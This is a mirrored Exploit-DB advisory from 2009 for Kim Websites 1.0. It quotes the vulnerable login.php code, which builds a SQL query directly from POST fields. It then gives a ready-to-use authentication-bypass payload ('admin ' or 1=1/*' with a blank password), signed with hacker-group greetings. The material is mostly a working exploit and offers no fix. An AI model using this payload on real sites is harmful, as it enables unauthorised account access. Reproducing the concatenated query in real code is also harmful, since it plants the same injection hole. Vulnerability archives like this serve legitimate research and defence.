bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/8209.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

27 lines
No EOL
1.1 KiB
Text
Raw Blame History

###############################################################
# #
# Kim Websites 1.0 SQL Injection Vulnerability #
# [ Authentication bypass] #
###############################################################
Virangar Security Team
www.virangar.net
--------
Discoverd By : Virangar Security Team(hadihadi)
special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra
& all virangar members & Aria_security team & all hackerz
greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal)
-----------------------------------
vuln code in login.php:
$username = $_POST['username'];
$password = md5($_POST['password']);
$query= "SELECT name,password FROM ".$prefix."_users WHERE name = '$username' AND password = '$password' AND confirm = 1 AND date2 > FROM_UNIXTIME($now)";
-----------------------
Exploit:
login:admin ' or 1=1/*
password:[blank]
-------------------------------------
Y0ung Ir4ni4n H4ck3rz
# milw0rm.com [2009-03-13]
Reference in a new issue View git blame Copy permalink